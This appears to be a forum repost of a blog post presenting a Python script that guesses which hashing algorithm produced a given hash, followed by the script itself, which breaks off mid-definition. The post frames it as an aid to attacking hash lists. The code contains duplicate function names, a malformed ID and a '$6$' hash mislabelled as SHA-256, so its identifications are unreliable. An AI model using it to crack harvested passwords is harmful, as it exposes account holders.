Nytro

[h=2]Hash Detector Tool[/h] Since 2009 when I wrote: " The string Decoding Process" (published by hakin9 magazine) I use crafted tools to automatically decode strings (some of them have been published on this blog). Decoding strings results pretty hard especially nowadays where many encoding algorithms are commonly used over planty "daily life tools". Understanding what encoding we are facing becomes really important if we are analyzing Hashing. Let's assume we 've just got a file including hundreds of different hash strings, how to identify what kind of hashing algorithm have been used ? Having a list o hashes, that potentially could "hide" passwords or important data, having the power of a bruteforce machine and the right tools to attack the hash list without knowing what algorithm have been used could be pretty nesty for attackers. Indeed attackers might have difficult time in attacking hashes without knowing what is the generation algorithm. Surfing on this "painful wave" I decided to share a pretty python code that helped me out in solving this specific problem. The script can be downloaded here (pastebin). The following image shows how simple the script is, and how could be really easy to update it within new hashing algorithms. If you are planning to add new features to the script, please give me the diff file, so that we can create a more generic tool able to detect as many different hashing algorithms as possible. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]HashFinder.py (click to enlarge)[/TD] [/TR] [/TABLE] The script is quite modular and easy to update. What you need to to is to add your new hashing function within its own identifier into the "algorithms" array (lets see the following image). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Algorithms array list: easy to expand (click to enlarge)[/TD] [/TR] [/TABLE] After having filled up the "algorithms" array, you need to add the new function which finds out if the string you are processing might be generated (or not) from the hash algorithm you 've just "declared" in the "algorithms" array. The following image shows to you some examples already implemented. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Function that perform the detection (click to enlarge)[/TD] [/TR] [/TABLE] Finally, in a very quick'n dirty way you want to process the input string by adding the generated function to the main flow. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Adding functions to control flow (click to enlarge)[/TD] [/TR] [/TABLE] Hope it could be useful to everybody, enjoy your new hash detector tool ! #!/usr/bin/env python logo=''' ######################################################################### # modified, adapted and encreased for www.marcoramilli.blogspot.com # #########################################################################''' algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} # hash.islower() minusculas # hash.isdigit() numerico # hash.isalpha() letras # hash.isalnum() alfanumerico def CRC16(): hs='4607' if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101020") def CRC16CCITT(): hs='3d08' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101040") def FCS16(): hs='0e5b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101060") def CRC32(): hs='b33fd057' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102040") def ADLER32(): hs='0607cb42' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102020") def CRC32B(): hs='b764a0d9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102060") def XOR32(): hs='0000003f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102080") def GHash323(): hs='80000000' if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: jerar.append("103040") def GHash325(): hs='85318985' if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: jerar.append("103020") def DESUnix(): hs='ZiY8YtDKXJwYQ' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: jerar.append("104020") def MD5Half(): hs='ae11fd697ec92c7c' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("105060") def MD5Middle(): hs='7ec92c7c98de3fac' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("105040") def MySQL(): hs='63cea4673fd25f46' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("105020") def DomainCachedCredentials(): hs='f42005ec1afe77967cbc83dce1b4d714' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106025") def Haval128(): hs='d6e3ec49aa0f138a619f27609022df10' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106160") def Haval128HMAC(): hs='3ce8b0ffd75bc240fc7d967729cd6637' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106165") def MD2(): hs='08bbef4754d98806c373f2cd7d9a43c4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106060") def MD2HMAC(): hs='4b61b72ead2b0eb0fa3b8a56556a6dca' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106120") def MD4(): hs='a2acde400e61410e79dacbdfc3413151' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106040") def MD4HMAC(): hs='6be20b66f2211fe937294c1c95d1cd4f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106100") def MD5(): hs='ae11fd697ec92c7c98de3fac23aba525' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106020") def MD5HMAC(): hs='d57e43d2c7e397bf788f66541d6fdef9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106080") def MD5HMACWordpress(): hs='3f47886719268dfa83468630948228f6' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106140") def NTLM(): hs='cc348bace876ea440a28ddaeb9fd3550' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106029") def RAdminv2x(): hs='baea31c728cbf0cd548476aa687add4b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106027") def RipeMD128(): hs='4985351cd74aff0abc5a75a0c8a54115' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106180") def RipeMD128HMAC(): hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106185") def SNEFRU128(): hs='4fb58702b617ac4f7ca87ec77b93da8a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106200") def SNEFRU128HMAC(): hs='59b2b9dcc7a9a7d089cecf1b83520350' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106205") def Tiger128(): hs='c086184486ec6388ff81ec9f23528727' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106220") def Tiger128HMAC(): hs='c87032009e7c4b2ea27eb6f99723454b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106225") def md5passsalt(): hs='5634cc3b922578434d6e9342ff5913f7' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106240") def md5saltmd5pass(): hs='245c5763b95ba42d4b02d44bbcd916f1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106260") def md5saltpass(): hs='22cc5ce1a1ef747cd3fa06106c148dfa' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106280") def md5saltpasssalt(): hs='469e9cdcaff745460595a7a386c4db0c' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106300") def md5saltpassusername(): hs='9ae20f88189f6e3a62711608ddb6f5fd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106320") def md5saltmd5pass(): hs='aca2a052962b2564027ee62933d2382f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106340") def md5saltmd5passsalt(): hs='de0237dc03a8efdf6552fbe7788b2fdd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106360") def md5saltmd5passsalt(): hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106380") def md5saltmd5saltpass(): hs='d8f3b3f004d387086aae24326b575b23' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106400") def md5saltmd5md5passsalt(): hs='81f181454e23319779b03d74d062b1a2' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106420") def md5username0pass(): hs='e44a60f8f2106492ae16581c91edb3ba' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106440") def md5usernameLFpass(): hs='654741780db415732eaee12b1b909119' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106460") def md5usernamemd5passsalt(): hs='954ac5505fd1843bbb97d1b2cda0b98f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106480") def md5md5pass(): hs='a96103d267d024583d5565436e52dfb3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106500") def md5md5passsalt(): hs='5848c73c2482d3c2c7b6af134ed8dd89' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106520") def md5md5passmd5salt(): hs='8dc71ef37197b2edba02d48c30217b32' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106540") def md5md5saltpass(): hs='9032fabd905e273b9ceb1e124631bd67' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106560") def md5md5saltmd5pass(): hs='8966f37dbb4aca377a71a9d3d09cd1ac' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106580") def md5md5usernamepasssalt(): hs='4319a3befce729b34c3105dbc29d0c40' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106600") def md5md5md5pass(): hs='ea086739755920e732d0f4d8c1b6ad8d' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106620") def md5md5md5md5pass(): hs='02528c1f2ed8ac7d83fe76f3cf1c133f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106640") def md5md5md5md5md5pass(): hs='4548d2c062933dff53928fd4ae427fc0' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106660") def md5sha1pass(): hs='cb4ebaaedfd536d965c452d9569a6b1e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106680") def md5sha1md5pass(): hs='099b8a59795e07c334a696a10c0ebce0' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106700") def md5sha1md5sha1pass(): hs='06e4af76833da7cc138d90602ef80070' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106720") def md5strtouppermd5pass(): hs='519de146f1a658ab5e5e2aa9b7d2eec8' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106740") def LineageIIC4(): hs='0x49a57f66bd3d5ba6abda5579c264a0e4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: jerar.append("107080") def MD5phpBB3(): hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: jerar.append("107040") def MD5Unix(): hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: jerar.append("107060") def MD5Wordpress(): hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: jerar.append("107020") def MD5APR(): hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: jerar.append("108020") def Haval160(): hs='a106e921284dd69dad06192a4411ec32fce83dbb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109100") def Haval160HMAC(): hs='29206f83edc1d6c3f680ff11276ec20642881243' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109200") def MySQL5(): hs='9bb2fb57063821c762cc009f7584ddae9da431ff' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109040") def MySQL160bit(): hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: jerar.append("109060") def RipeMD160(): hs='dc65552812c66997ea7320ddfb51f5625d74721b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109120") def RipeMD160HMAC(): hs='ca28af47653b4f21e96c1235984cb50229331359' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109180") def SHA1(): hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109020") def SHA1HMAC(): hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109140") def SHA1MaNGOS(): hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109220") def SHA1MaNGOS2(): hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109240") def Tiger160(): hs='c086184486ec6388ff81ec9f235287270429b225' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109080") def Tiger160HMAC(): hs='6603161719da5e56e1866e4f61f79496334e6a10' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109160") def sha1passsalt(): hs='f006a1863663c21c541c8d600355abfeeaadb5e4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109260") def sha1saltpass(): hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109280") def sha1saltmd5pass(): hs='860465ede0625deebb4fbbedcb0db9dc65faec30' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109300") def sha1saltmd5passsalt(): hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109320") def sha1saltsha1pass(): hs='58714327f9407097c64032a2fd5bff3a260cb85f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109340") def sha1saltsha1saltsha1pass(): hs='cc600a2903130c945aa178396910135cc7f93c63' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109360") def sha1usernamepass(): hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109380") def sha1usernamepasssalt(): hs='00025111b3c4d0ac1635558ce2393f77e94770c5' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109400") def sha1md5pass(): hs='fa960056c0dea57de94776d3759fb555a15cae87' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("1094202") def sha1md5passsalt(): hs='1dad2b71432d83312e61d25aeb627593295bcc9a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109440") def sha1md5sha1pass(): hs='8bceaeed74c17571c15cdb9494e992db3c263695' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109460") def sha1sha1pass(): hs='3109b810188fcde0900f9907d2ebcaa10277d10e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109480") def sha1sha1passsalt(): hs='780d43fa11693b61875321b6b54905ee488d7760' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109500") def sha1sha1passsubstrpass03(): hs='5ed6bc680b59c580db4a38df307bd4621759324e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109520") def sha1sha1saltpass(): hs='70506bac605485b4143ca114cbd4a3580d76a413' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109540") def sha1sha1sha1pass(): hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109560") def sha1strtolowerusernamepass(): hs='79f575543061e158c2da3799f999eb7c95261f07' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109580") def Haval192(): hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110040") def Haval192HMAC(): hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110080") def Tiger192(): hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110020") def Tiger192HMAC(): hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110060") def MD5passsaltjoomla1(): hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: jerar.append("112020") def SHA1Django(): hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: jerar.append("113020") def Haval224(): hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114040") def Haval224HMAC(): hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114080") def SHA224(): hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114020") def SHA224HMAC(): hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114060") def SHA256(): hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115020") def SHA256HMAC(): hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115120") def Haval256(): hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115040") def Haval256HMAC(): hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115140") def GOSTR341194(): hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115060") def RipeMD256(): hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115080") def RipeMD256HMAC(): hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115160") def SNEFRU256(): hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115100") def SNEFRU256HMAC(): hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115180") def SHA256md5pass(): hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115200") def SHA256sha1pass(): hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115220") def MD5passsaltjoomla2(): hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: jerar.append("116020") def SAM(): hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: jerar.append("116040") def SHA256Django(): hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: jerar.append("117020") def RipeMD320(): hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("118020") def RipeMD320HMAC(): hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("118040") def SHA384(): hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("119020") def SHA384HMAC(): hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("119040") def SHA256s(): hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: jerar.append("120020") def SHA384Django(): 